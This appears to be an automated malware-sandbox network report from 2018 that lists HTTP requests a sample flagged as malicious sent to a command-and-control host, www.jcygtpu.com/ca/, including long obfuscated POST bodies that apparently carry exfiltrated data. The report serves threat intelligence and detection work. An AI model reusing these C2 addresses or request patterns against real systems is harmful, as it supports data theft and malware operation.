jdWWSsO1IS-hjpz1rv9YRlQbpknoq3Au6tVegaxLNRFLHKQLuMcqaKp2SOCFY5v7lZmSIyAXtuxvctl4iosgWpTDpSZKyyf2luzC8NQMyGhiHNrQ5uxeTQh76opyHp9X2RPqQDGAk3sBlGsQ-LPSJnaFkLyyVTXWVl4YbnkMakcKga3SCxUEUUYFN2j5GcyS7f-tdK7GjE-vDoSM2I3M1uTbcYgf9uLFxJXIsSM~xkqbVBRJf2SWXddlp~eOINcRhgMLNkElq5CJ8BdNMtvcM1gbNVhhChElqGL3VvZcL77g8rIz3hGZqDd2EbEVrCyoc7LW5tANWDUdNarKCquiCFBlm~
http://www.jcygtpu.com/ca/?8pgTVpAp=o3AtFaTs1rmGXcR0wgItQmgbfTY+urSXwC3w6Z/iYvvKaJ7Bo/+NxMYDAwHpQL/BoezhCD4D&Bj=lHU80vox_T4h
- Hostname: www.jcygtpu.com
- IP Address:
- Port: 80
- Count: 1
GET /ca/?8pgTVpAp=o3AtFaTs1rmGXcR0wgItQmgbfTY+urSXwC3w6Z/iYvvKaJ7Bo/+NxMYDAwHpQL/BoezhCD4D&Bj=lHU80vox_T4h HTTP/1.1 Host: www.jcygtpu.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.jcygtpu.com/ca/
- Hostname: www.jcygtpu.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.jcygtpu.com Connection: close Content-Length: 2202 Cache-Control: no-cache Origin: http://www.jcygtpu.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.jcygtpu.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate 8pgTVpAp=gVMXb6ifqI2VGrlV6m4xSzA8JGtsgYWXhWC84b(QYMCLe5XZoaeErYBwM2TmHYvf0vSaIHoHzS7bTu3WeZEo48(9t765f08hUEo4BCSnfeK31ZSJ0Ve8EFh8j-A4NJpWklZ5P0oZ6c2yOz9spqdTddNxcoJ2(th0vkF8srAS4FGqsaHQyOROMOFvfrzq6uuua0Pa2MHJgBYlnK5wd7BF6nPGI8ha276ACsEvih7xVO8Ys-2VsWUGEhdLsT9axZs8MyIQQ4oHHw9ylnDj4SMD0SgHtTB_PSlZ8Wdmhn5g3IjSEFBi7QeOd-1KLdUrUm78UjNj4D5RiJejLupRj4KmCErFpT12VvhXMc2GBNKz6mNiq7NOkIIAqiefxgktzAgRtOrXxFLoA_uo7AMhjXkGlfJXANNl08XPtRZoYm68p3wKBj4YR_YMq3NxMWmWfRtm0SwEfJ1k(laD4FQK5e2Z1V1de81mY97aW1NPTwtTb3reAN0Zp8L5JE~nrSxxF87CDG7NlZqlC-uiSg5A(XD-x-coieL1W1QriLplcVYGSeoTWsy_syDhiqU0fbWWFt5ImxQZ47eqfhP1SNvC3SmxCXCVXk8jluXGiJ(S9UO4aP6bvsJTAilasiY26IST9jPviBL3C9CAx4mRz-JWh-i1Aw~uAsL5NatMz7tRiMpfvZ5UYmDfRD8vq_Uz5scqLHoB3kVKyVjOurROPcYgEQdt7M9QRJs1mPcdEhw6JF7oOPfwqMb64ErW2HI7o7ABLSqkGX0E6c2BUIKXNR5w~DEt~cma714EQWUHLJ~EUY(2aUXGbRs1UkRVCalwUax0a4G-alRHnU(YZAYTpsrti8oIy3kSSmuVU7Sc9G2-NPfdKkasqgk83tBVNWyMwKeusn7ptk5CbEG8mnfQp0cuqwKYKX5TTeyCV35nz7Y2db(8ngYWhFwJH76RG6Ze8jYm6Dmhfh78VBX49kyPScPnKm3HJJoD5KccXE5V5tiV1YD-EJ72s9HHU0MAVLrk9e~ZQYWaTz8FE-GmyJJXph5JqQ7jlWzY7bp1CTYX75a5bVE7uRd672NnTxhOP5xngbE3YKPf5aq-MT0thJ9F8p0Luz(iL90Q~iK2o8dBYVnBtHaRy_kNbHCyzTrlyK67S3WkOcD26M2dbxj1TA3jIbTVVcm1(3WpWKVVxfu_0kRlKvbOOPeK6LGTxwdnit~G~w8jQ23lfrFs~yjJedhd4EQwfUiyA6T6S9Vr~prN5oPUjcc2EdPH8fXr(BJ-aQNNojHny5MkVzGYYSM3fsfyAZ4Kr-~2TNx7TTL5syGme5Mo0wrre4PmxqJy(f561VvtYw(pFyV60_qO3sY0cA7IlSw4MA~tcHvMqfDod_hhuVxmsRVxIwFo4W3Jap6aWlNgHXZKCmcjfFCQ6tRNpK62LzuiERWBgwyWpTaG~YIielhiArPni4io1maiEnjLls837TxaNLGDgKA7OYQf2V~ahzCwu6nszrI-opS8bISz9_rXSOcSOvfmosq8aGRdfh56NxlO7LM7Ta(ZIUYSvyS2FFgbCayMpyt4ir6kri8kWrhDiwsLfbz-A7RGnvu75wh3cipu~xtxI_a_(eIBpWdYaeybh4F3LKt-NqHYOGhWtgYjtg3duTY7NFwfAnlNlB14yUuGG6LhQXVuOUeA1KfPPK6CKiJ9zXJtZzyipjylsC7-bt087gOqBr3RgZKtfoTesTrOmTRJGr7cXUdmPqkpurFKCMBRu9bt109kpQq-rz31eHfI1123gzZIbTt8ZOY0MEbQpnK2~5IyNnKaeAfdrDjOEYVvcAPPC5FeBDv5CmmroGAkPfo7pacV(6Wo~nY6ydLTTeVgf8wB8b1KfQ0563ZkAdNfLG4iDx(Uoe4IFiPP(H8r7bifcwweWi3z0fFMi_3t11o_Odb8(NCeNV6qB3QT3cGtyeIzDlvxwa7JC9GmM-uovMrTAagY(gpqLAWJXmlkXhD9p-~p0JBIA2gx3s~wqj2F4YqmLy9A~7Z1Hbjt7G(d(rY_jjJEBIZL4M0VI_JKblBtKcFCFSElg_LsWo0f(44hIuXFBg1Sx9nCkRYlXMF9(XmX57eEQfiP~MJUznw_gg5yaNFFIamBtShfBEFiLAWVOJ9cnXDh8ceOdaxmMmnChSELy6YUHKdululWA3uf3OFdIGJShA6P0pMz\x00_mPvK\x00w
http://www.jcygtpu.com/ca/
- Hostname: www.jcygtpu.com
- IP Address:
- Port: 80
- Count: 1
POST /ca/ HTTP/1.1 Host: www.jcygtpu.com Connection: close Content-Length: 57310 Cache-Control: no-cache Origin: http://www.jcygtpu.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.jcygtpu.com/ca/ Accept-Language: en-US Accept-Encoding: gzip, deflate 8pgTVpAp=gVMXb_Hoo4yIV59Et0NuPAovRmgtpvSGiFaa4bPUTurUU6(Z8o2DoIBzEWTlRoigoMjVIGtazUjabvnOY78Zncj3hbvvb3EmUmVnWH2nCeOpxLrV2n6gbV9-ofogf5IEiH1HI1Ix~cO9B2FUpJ8BCdZ2OL1s~KwNhFEvy_lU2g2knoPYyPl7LNNSUMXZmtnRQXja7ceR1x47iNNoQNJ48W(7fJES4KaDWPhkvkDCGcccj5z18mQNNRtyg0JPwJQpN3YLf508BDxuzGiU(xAL3ixalwh_BiFl5Ulu835D1LTOKlBa7QbNfJ9GVNUpQkO6ETE8jSlBhcujKMAKl6S9Jkrz3zFhRYJMMcmSHuqz7kpiubdNiIIAkCedxgk2zAh3tMLbyFDoQOSq6y1g0V5_7PJTDMNjw4iitWMrYGW8kmkJXyoEXuYNiTNhH2vdfRht1QYiMZ5P~laAwVMnu_3G4n8bDvVWL-GHWVZQTXBHJgKdLtwJvPn1EQyA8CViItW-Dmu6uYGNKbi0STgn7zbi4fgXp8OuT1gE1PdEeFssd4tKVMuo8wG-nLMlHY6QAMJJgCwSj4OrehC3X8i23wbWFFqXBUhdnrb0oIGtsDiJQM~6i5VbdDJppAgcwKWr1hTm9kPxa_Lw67eOr9or9tzkEx(GSsXPD4sm9-saoOBE4q1DUVOcczADn5Yv0foQIi8lqQpbrHDfs6V_NulZcnULvrRcNpcth44wEh4mO1(oPLnwuNbl7nDR43IHibAdPXzBGUEY7c6BArSVMSB67UtRw8nV9E0HHilxLLSuGoDMMj2QeUR8VkRSA_kGf619EJ3rPFFXtG6FN2les_DomYgL22F3TGjKeun0ymb1QMH3YFSw0xAG1pFNQkbS27WL9FWhgx8deVirtE2cnmEQqS7LVHF4WcKBWhtHx7QTf_~ftzci4UcdV73EV7wU(TAy7hCDW1H_UwTqx03RTdSSOnj6Pclj5qZNfkRmuq~DzrflCIiUg_XvM1RmRIbS78SJAJOAKxg1RZyVza1-lQxciH6GsBbw6Lt-BSM72u2Ccj8Oim9prw08WkgpD-9F0e9hSPrPm9e3ABUkioV0~Yx-qSLGAfUxyQaTs9d9YU3rtmeRi_sNaXiy5zHc2L2tRHqIHs3x(OybZU2lAi(YD7vMde3G7ljIHLxIjcD_40YFeIWhOMyK7oysnhwxhvaRuAF8C1PMJJglyi3gKcR9~HADQyqjLIDmQNID45aD0oivkYlMHIGyxfP68DRJYgYIgy~S06xhXTmOTBQ2UaHuML0I8_6IZMJwbTvogwq-bKMlpmGAIpXSpcBrobcz5XrQfBfmXA5Oj4b04OE2RRvy6issUVL4Zkb1nNXyetVxgkk8s3goFBYr1BnaSbaXWA55MkgdFVJna0Gl~eRs8auqFjqvQSXF1QfbsT6enpZ3EV8FRvKSsP~SklurUmr1ks9pgzYbYdiDgJx8WosK2iOQvCCF~oHNneU9trbwXsat1f(YB4d5e4byjvSKWWZVPUchJxxs8648UeeXKjtKvAaSO10bHqSpsz91jLS40DMKB98RzDkTfYXlAapZufi88Q1QancP1wJIeeigxO85iks9Youb5ZZNBsxqT5DoUF5Sji8wpT6yvjF6aAo9IhUY5DZ2lE2oM4zkCmFKM0TTh4DLE_WJHiFoljtTfDyoljXquyngbsQzoXCpBuzSspSofaDA3i73nQZeCJL0El9YH78AhOZ3ENwNrMfVjmJspx7ZqQDFWge-1En4qA5yeh04e8dMeFj34l66qadGHyGNSgbV0ELDHat4VknMFotDQRD1BjDIiFpBJcQQspsn~7Kl2Wg8usCebO5VUvtO5ZtNTB45slAsH9BJMl40CxjrlMQoSzS64gY-65b9MQoTWiuS2fFElcXf~XAaB8Hmr8H5GgL4PQgV0set7bJSEWjY1ZWhWPX_Ie2htt(SQYQW2x0zcQTJXSQ0SlLC0IusxKNsPBo0icCmrjaCtIidH3MX~-szEdrAqnDcmLRllU5OBZFu5rkxe4l2XUsUE9RnURYvh-(dYJF8oLkuN8XQBxZwgpbYkw14fvlD1S~07rCjd76P1PVBlnUAjCY_f_g1KumUjQFEEFRKGQaiK4II7EDL6ci8SOhxMEfN3hMCzZwSXp9P2NpWYiL9541rHwUd732pwZZ4E7cPb0rev54ap9pLui(4uyzHVIqtFQRbqNH_7BOT2088wbr-50(vbqX5FRl_NFmGmCRqQFIqVvOHq3Djzhhv9WGCOrLBy1j5BHwSXBCYCdabICP4jo~WcnNQJ7tNvOLqMMyIyWYP0Tpr(PeU2vRHjMxkzXPPSxe0CDnF6HeCduN_Q8dPCcF5dXbdTN2DfhgRVKRW520dQjbQqqXMypzvUg2XOHDMINPEsAB
Detected family: #Malicious
TheSystem Itself @ 2018-11-08 12:20:03
#infosec #automation
TheSystem Itself @ 2018-11-08 12:15:21